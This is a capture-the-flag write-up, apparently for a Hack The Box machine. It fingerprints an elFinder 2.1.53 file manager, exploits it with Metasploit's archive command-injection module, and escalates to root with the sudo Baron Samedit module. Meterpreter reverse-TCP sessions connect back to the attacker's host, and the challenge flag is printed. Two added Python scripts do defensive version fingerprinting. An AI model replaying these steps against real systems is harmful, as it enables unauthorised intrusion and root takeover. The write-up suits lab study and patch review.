Challenge

[image: 2024-01-19T07:49:06.png]

Solution


Question 1


┌──(kali㉿HgTrojan)-[~]
└─$ curl 10.129.203.52
<!DOCTYPE html>
<html>
        <head>
                <meta charset="utf-8">
                <meta http-equiv="X-UA-Compatible" content="IE=edge,chrome=1">
                <meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=2">
                <title>elFinder 2.1.x source version with PHP connector</title>

                <!-- Require JS (REQUIRED) -->
                <!-- Rename "main.default.js" to "main.js" and edit it if you need configure elFInder 2.1.53 options or any things -->
                <script data-main="./main.default.js" src="//cdnjs.cloudflare.com/ajax/libs/require.js/2.3.6/require.min.js"></script>
                <script>
                        define('elFinderConfig', {
                                // elFinder options (REQUIRED)
                                // Documentation for client options:
                                // https://github.com/Studio-42/elFinder/wiki/Client-configuration-options
                                defaultOpts : {
                                        url : 'php/connector.minimal.php', // or connector.maximal.php : connector URL (REQUIRED)
                                        commandsOptions : {
                                                edit : {
                                                        extraOptions : {
                                                                // set API key to enable Creative Cloud image editor
                                                                // see https://console.adobe.io/
                                                                creativeCloudApiKey : '',
                                                                // browsing manager URL for CKEditor, TinyMCE
                                                                // uses self location with the empty value
                                                                managerUrl : ''
                                                        }
                                                },
                                                quicklook : {
                                                        // to enable CAD-Files and 3D-Models preview with sharecad.org
                                                        sharecadMimes : ['image/vnd.dwg', 'image/vnd.dxf', 'model/vnd.dwf', 'application/vnd.hp-hpgl', 'application/plt', 'application/step', 'model/iges', 'application/vnd.ms-pki.stl', 'application/sat', 'image/cgm', 'application/x-msmetafile'],
                                                        // to enable preview with Google Docs Viewer
                                                        googleDocsMimes : ['application/pdf', 'image/tiff', 'application/vnd.ms-office', 'application/msword', 'application/vnd.ms-word', 'application/vnd.ms-excel', 'application/vnd.ms-powerpoint', 'application/vnd.openxmlformats-officedocument.wordprocessingml.document', 'application/vnd.openxmlformats-officedocument.spreadsheetml.sheet', 'application/vnd.openxmlformats-officedocument.presentationml.presentation', 'application/postscript', 'application/rtf'],
                                                        // to enable preview with Microsoft Office Online Viewer
                                                        // these MIME types override "googleDocsMimes"
                                                        officeOnlineMimes : ['application/vnd.ms-office', 'application/msword', 'application/vnd.ms-word', 'application/vnd.ms-excel', 'application/vnd.ms-powerpoint', 'application/vnd.openxmlformats-officedocument.wordprocessingml.document', 'application/vnd.openxmlformats-officedocument.spreadsheetml.sheet', 'application/vnd.openxmlformats-officedocument.presentationml.presentation', 'application/vnd.oasis.opendocument.text', 'application/vnd.oasis.opendocument.spreadsheet', 'application/vnd.oasis.opendocument.presentation']
                                                }
                                        },
                                        // bootCalback calls at before elFinder boot up 
                                        bootCallback : function(fm, extraObj) {
                                                /* any bind functions etc. */
                                                fm.bind('init', function() {
                                                        // any your code
                                                });
                                                // for example set document.title dynamically.
                                                var title = document.title;
                                                fm.bind('open', function() {
                                                        var path = '',
                                                                cwd  = fm.cwd();
                                                        if (cwd) {
                                                                path = fm.path(cwd.hash) || null;
                                                        }
                                                        document.title = path? path + ':' + title : title;
                                                }).bind('destroy', function() {
                                                        document.title = title;
                                                });
                                        }
                                },
                                managers : {
                                        // 'DOM Element ID': { /* elFinder options of this DOM Element */ }
                                        'elfinder': {}
                                }
                        });
                </script>
        </head>
        <body>

                <!-- Element where elFinder will be created (REQUIRED) -->
                <div id="elfinder"></div>

        </body>
</html>

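The response above answers the first question on its own: the page title discloses the product and major line ("elFinder 2.1.x"), a template comment left in the HTML discloses the exact release ("2.1.53"), and the inline config discloses the PHP connector path. The script below is an added example, not part of the write-up, showing how a defender's asset-inventory or exposure-review job would pull those three facts out of such a page automatically. It assumes only a saved copy of the HTML (a trimmed copy of the response above is embedded here as a constructed sample); the function name fingerprint_elfinder and the evidence labels are my own.

```python
import re
from html.parser import HTMLParser

# Constructed sample: a trimmed copy of the index page shown above (same title,
# leftover comment and connector URL), embedded so the script runs offline.
SAMPLE_HTML = """<!DOCTYPE html>
<html>
  <head>
    <title>elFinder 2.1.x source version with PHP connector</title>
    <!-- Rename "main.default.js" to "main.js" and edit it if you need configure elFInder 2.1.53 options or any things -->
    <script data-main="./main.default.js" src="//cdnjs.cloudflare.com/ajax/libs/require.js/2.3.6/require.min.js"></script>
    <script>
      define('elFinderConfig', {
        defaultOpts : {
          url : 'php/connector.minimal.php', // connector URL (REQUIRED)
        }
      });
    </script>
  </head>
  <body><div id="elfinder"></div></body>
</html>
"""


class _PageCollector(HTMLParser):
    """Collect the <title> text, every HTML comment and every inline <script> body."""

    def __init__(self):
        super().__init__()
        self.title = ""
        self.comments = []
        self.scripts = []
        self._in_title = False
        self._in_script = False

    def handle_starttag(self, tag, attrs):
        if tag == "title":
            self._in_title = True
        elif tag == "script":
            self._in_script = True

    def handle_endtag(self, tag):
        if tag == "title":
            self._in_title = False
        elif tag == "script":
            self._in_script = False

    def handle_data(self, data):
        if self._in_title:
            self.title += data
        elif self._in_script:
            self.scripts.append(data)

    def handle_comment(self, data):
        self.comments.append(data)


def fingerprint_elfinder(html):
    """Return what an index page discloses about elFinder: product, version, connector path, evidence."""
    parser = _PageCollector()
    parser.feed(html)
    result = {"product": None, "version": None, "connector": None, "evidence": []}

    # 1. The <title> names the product and a coarse version ("2.1.x").
    m = re.search(r"elfinder\s+(\d+\.\d+\.(?:\d+|x))", parser.title, re.IGNORECASE)
    if m:
        result["product"] = "elFinder"
        result["version"] = m.group(1)
        result["evidence"].append("title: " + parser.title.strip())

    # 2. A leftover template comment gives the exact release ("2.1.53"),
    #    which is more precise than the title and overrides it.
    for comment in parser.comments:
        m = re.search(r"elfinder\s+(\d+\.\d+\.\d+)", comment, re.IGNORECASE)
        if m:
            result["product"] = "elFinder"
            result["version"] = m.group(1)
            result["evidence"].append("comment: " + comment.strip())

    # 3. The inline config reveals the PHP connector endpoint, i.e. the request
    #    path a reviewer should expect to see in the web server's access logs.
    for script in parser.scripts:
        m = re.search(r"url\s*:\s*'([^']*connector[^']*)'", script)
        if m:
            result["connector"] = m.group(1)
            result["evidence"].append("config url: " + m.group(1))

    return result


if __name__ == "__main__":
    for key, value in fingerprint_elfinder(SAMPLE_HTML).items():
        print(f"{key}: {value}")
```

The exact release matters more than the title: the comment pins the install to 2.1.53, which is the number to compare against the project's changelog when deciding whether the two Metasploit modules found in the next step apply. Removing the template comment and the default title from a production deployment takes that information away from anyone reading the page.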

Question 2


The framework is known to be elFinder 2.1.x, so start msf:

┌──(root㉿HgTrojan)-[/home/kali]
└─# msfconsole
Metasploit tip: View missing module options with show missing
                                                  

Unable to handle kernel NULL pointer dereference at virtual address 0xd34db33f                                                             
EFLAGS: 00010046                                                                                                                           
eax: 00000001 ebx: f77c8c00 ecx: 00000000 edx: f77f0001                                                                                    
esi: 803bf014 edi: 8023c755 ebp: 80237f84 esp: 80237f60                                                                                    
ds: 0018   es: 0018  ss: 0018                                                                                                              
Process Swapper (Pid: 0, process nr: 0, stackpage=80377000)                                                                                
                                                                                                                                           
                                                                                                                                           
Stack: 90909090990909090990909090                                                                                                          
       90909090990909090990909090                                                                                                          
       90909090.90909090.90909090                                                                                                          
       90909090.90909090.90909090                                                                                                          
       90909090.90909090.09090900                                                                                                          
       90909090.90909090.09090900                                                                                                          
       ..........................                                                                                                          
       cccccccccccccccccccccccccc                                                                                                          
       cccccccccccccccccccccccccc                                                                                                          
       ccccccccc.................                                                                                                          
       cccccccccccccccccccccccccc                                                                                                          
       cccccccccccccccccccccccccc                                                                                                          
       .................ccccccccc                                                                                                          
       cccccccccccccccccccccccccc                                                                                                          
       cccccccccccccccccccccccccc                                                                                                          
       ..........................                                                                                                          
       ffffffffffffffffffffffffff                                                                                                          
       ffffffff..................                                                                                                          
       ffffffffffffffffffffffffff                                                                                                          
       ffffffff..................                                                                                                          
       ffffffff..................                                                                                                          
       ffffffff..................                                                                                                          
                                                                                                                                           

Code: 00 00 00 00 M3 T4 SP L0 1T FR 4M 3W OR K! V3 R5 I0 N5 00 00 00 00
Aiee, Killing Interrupt handler
Kernel panic: Attempted to kill the idle task!
In swapper task - not syncing                                                                                                              


       =[ metasploit v6.3.51-dev                          ]
+ -- --=[ 2384 exploits - 1235 auxiliary - 418 post       ]
+ -- --=[ 1391 payloads - 46 encoders - 11 nops           ]
+ -- --=[ 9 evasion                                       ]

Metasploit Documentation: https://docs.metasploit.com/

msf6 > search elFinder 

Matching Modules
================

   #  Name                                                               Disclosure Date  Rank       Check  Description
   -  ----                                                               ---------------  ----       -----  -----------
   0  exploit/multi/http/builderengine_upload_exec                       2016-09-18       excellent  Yes    BuilderEngine Arbitrary File Upload Vulnerability and execution
   1  exploit/unix/webapp/tikiwiki_upload_exec                           2016-07-11       excellent  Yes    Tiki Wiki Unauthenticated File Upload Vulnerability
   2  exploit/multi/http/wp_file_manager_rce                             2020-09-09       normal     Yes    WordPress File Manager Unauthenticated Remote Code Execution
   3  exploit/linux/http/elfinder_archive_cmd_injection                  2021-06-13       excellent  Yes    elFinder Archive Command Injection
   4  exploit/unix/webapp/elfinder_php_connector_exiftran_cmd_injection  2019-02-26       excellent  Yes    elFinder PHP Connector exiftran Command Injection


Interact with a module by name or index. For example info 4, use 4 or use exploit/unix/webapp/elfinder_php_connector_exiftran_cmd_injection

msf6 > use 3

After filling in the options and running it, we obtain www-data privileges.


Question 3


The challenge tells us that sudo is vulnerable.
Press Ctrl + Z to background the current session, then create a new one:

meterpreter > 
Background session 1? [y/N]  
msf6 exploit(linux/http/elfinder_archive_cmd_injection) > sessions

Active sessions
===============

  Id  Name  Type                   Information               Connection
  --  ----  ----                   -----------               ----------
  1         meterpreter x86/linux  www-data @ 10.129.203.52  10.10.16.39:4444 -> 10.129.203.52:54160 (10.129.
                                                             203.52)

msf6 exploit(linux/http/elfinder_archive_cmd_injection) > search sudo 1.8.31

Matching Modules
================

   #  Name                                    Disclosure Date  Rank       Check  Description
   -  ----                                    ---------------  ----       -----  -----------
   0  exploit/linux/local/sudo_baron_samedit  2021-01-26       excellent  Yes    Sudo Heap-Based Buffer Overflow


Interact with a module by name or index. For example info 0, use 0 or use exploit/linux/local/sudo_baron_samedit                                                                                                              

msf6 exploit(linux/http/elfinder_archive_cmd_injection) > use 0
[*] No payload configured, defaulting to linux/x64/meterpreter/reverse_tcp
msf6 exploit(linux/local/sudo_baron_samedit) > show options 

Module options (exploit/linux/local/sudo_baron_samedit):

   Name         Current Setting  Required  Description
   ----         ---------------  --------  -----------
   SESSION                       yes       The session to run this module on
   WritableDir  /tmp             yes       A directory where you can write files.


Payload options (linux/x64/meterpreter/reverse_tcp):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST  10.5.10.131      yes       The listen address (an interface may be specified)
   LPORT  4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Automatic



View the full module info with the info, or info -d command.

msf6 exploit(linux/local/sudo_baron_samedit) > set session 1
session => 1
msf6 exploit(linux/local/sudo_baron_samedit) > set l
set lengths   set lhost     set loglevel  set lport     
msf6 exploit(linux/local/sudo_baron_samedit) > set lhost 10.10.16.39
lhost => 10.10.16.39
msf6 exploit(linux/local/sudo_baron_samedit) > run

[*] Started reverse TCP handler on 10.10.16.39:4444 
[!] SESSION may not be compatible with this module:
[!]  * incompatible session architecture: x86
[*] Running automatic check ("set AutoCheck false" to disable)
[!] The service is running, but could not be validated. sudo 1.8.31 may be a vulnerable build.
[*] Using automatically selected target: Ubuntu 20.04 x64 (sudo v1.8.31, libc v2.31)
[*] Writing '/tmp/EaLIXMf51.py' (763 bytes) ...
[*] Writing '/tmp/libnss_Ubl/QLO .so.2' (548 bytes) ...
[*] Sending stage (3045380 bytes) to 10.129.203.52
[+] Deleted /tmp/EaLIXMf51.py
[+] Deleted /tmp/libnss_Ubl/QLO .so.2
[*] 
[*] Alternative exploit target(s) exist for this OS version:
[*] 2: Ubuntu 20.04 x64 (sudo v1.8.31, libc v2.31) - alternative
[*] Run `set target <id>` to select an alternative exploit script
[+] Deleted /tmp/libnss_Ubl
[*] Meterpreter session 2 opened (10.10.16.39:4444 -> 10.129.203.52:54646) at 2024-01-19 02:46:28 -0500

meterpreter > shell
Process 20457 created.
Channel 1 created.
^C
Terminate channel 1? [y/N]  y
meterpreter > cd /root
meterpreter > ls
Listing: /root
==============

Mode              Size   Type  Last modified              Name
----              ----   ----  -------------              ----
100600/rw-------  178    fil   2022-05-16 11:35:30 -0400  .bash_history
100644/rw-r--r--  3106   fil   2022-05-16 11:34:51 -0400  .bashrc
040700/rwx------  4096   dir   2022-05-16 09:46:07 -0400  .cache
040700/rwx------  4096   dir   2022-05-16 09:46:06 -0400  .config
040755/rwxr-xr-x  4096   dir   2022-05-16 09:46:07 -0400  .local
100644/rw-r--r--  161    fil   2019-12-05 09:39:21 -0500  .profile
100644/rw-r--r--  75     fil   2022-05-16 04:45:33 -0400  .selected_editor
040700/rwx------  4096   dir   2021-10-06 13:37:09 -0400  .ssh
100600/rw-------  13300  fil   2022-05-16 11:34:51 -0400  .viminfo
100644/rw-r--r--  291    fil   2022-05-16 09:51:29 -0400  .wget-hsts
100644/rw-r--r--  24     fil   2022-05-16 11:18:40 -0400  flag.txt
040755/rwxr-xr-x  4096   dir   2021-10-06 13:37:19 -0400  snap

meterpreter > cat flag.txt
HTB{5e55ion5_4r3_sw33t}
meterpreter > 

With that, privileges are escalated to root and the flag is obtained.
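The escalation step hinges on one fact the challenge hands out: the host runs sudo 1.8.31, which falls inside the range affected by the heap-based overflow that the Metasploit module calls Baron Samedit. The script below is an added example, not part of the write-up, of the version-range check a patch-status or vulnerability-management job would run over the output of sudo --version on its own hosts. The affected bounds (legacy 1.8.2 through 1.8.31p2, stable 1.9.0 through 1.9.5p1, fixed in 1.9.5p2) are my own input from the upstream advisory and are not stated on the page; the sample output, the function names and the verdict strings are constructed for the example.

```python
import re

# Affected sudo releases for the heap-based overflow that Metasploit names
# "Baron Samedit" (the module used above): legacy 1.8.2 through 1.8.31p2 and
# stable 1.9.0 through 1.9.5p1; 1.9.5p2 carries the fix. These bounds are my
# own input from the upstream advisory, not something the write-up states.
AFFECTED_RANGES = [
    ((1, 8, 2, 0), (1, 8, 31, 2)),
    ((1, 9, 0, 0), (1, 9, 5, 1)),
]

# Constructed sample of `sudo --version` output for a 1.8.31 host, matching
# the version the challenge gives; only the first line matters to the check.
SAMPLE_SUDO_VERSION = """Sudo version 1.8.31
Sudoers policy plugin version 1.8.31
Sudoers file grammar version 46
Sudoers I/O plugin version 1.8.31
"""


def parse_sudo_version(text):
    """Turn 'Sudo version 1.8.31p2' (or a bare '1.8.31') into a comparable 4-tuple.

    A missing 'pN' patch level counts as p0, so 1.8.31 sorts below 1.8.31p2.
    """
    m = re.search(r"(\d+)\.(\d+)\.(\d+)(?:p(\d+))?", text)
    if not m:
        raise ValueError("no sudo version string found in: %r" % text)
    major, minor, patch, plevel = m.groups()
    return (int(major), int(minor), int(patch), int(plevel) if plevel else 0)


def version_in_affected_range(text):
    """True when the version string falls inside one of the published affected ranges."""
    v = parse_sudo_version(text)
    return any(lo <= v <= hi for lo, hi in AFFECTED_RANGES)


def assess(text):
    """Map a version string to a triage verdict for a patch-status report.

    Distributions backport the fix without changing the upstream version
    number, so an in-range hit is a signal to verify, not a confirmed finding.
    """
    if version_in_affected_range(text):
        return "in affected range - confirm distro backport status before closing"
    return "outside affected range"


if __name__ == "__main__":
    samples = (
        SAMPLE_SUDO_VERSION,
        "Sudo version 1.8.31p2",
        "Sudo version 1.9.5p2",
        "Sudo version 1.8.32",
    )
    for sample in samples:
        print(parse_sudo_version(sample), "->", assess(sample))
```

The backport caveat is visible in the transcript itself: the module's automatic check reports that sudo 1.8.31 "may be a vulnerable build" but "could not be validated", because the version string alone cannot tell a patched distro package from an unpatched one. A version check like this one is a cheap first pass for finding hosts to look at; closing the finding still needs the package changelog or a vendor advisory.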
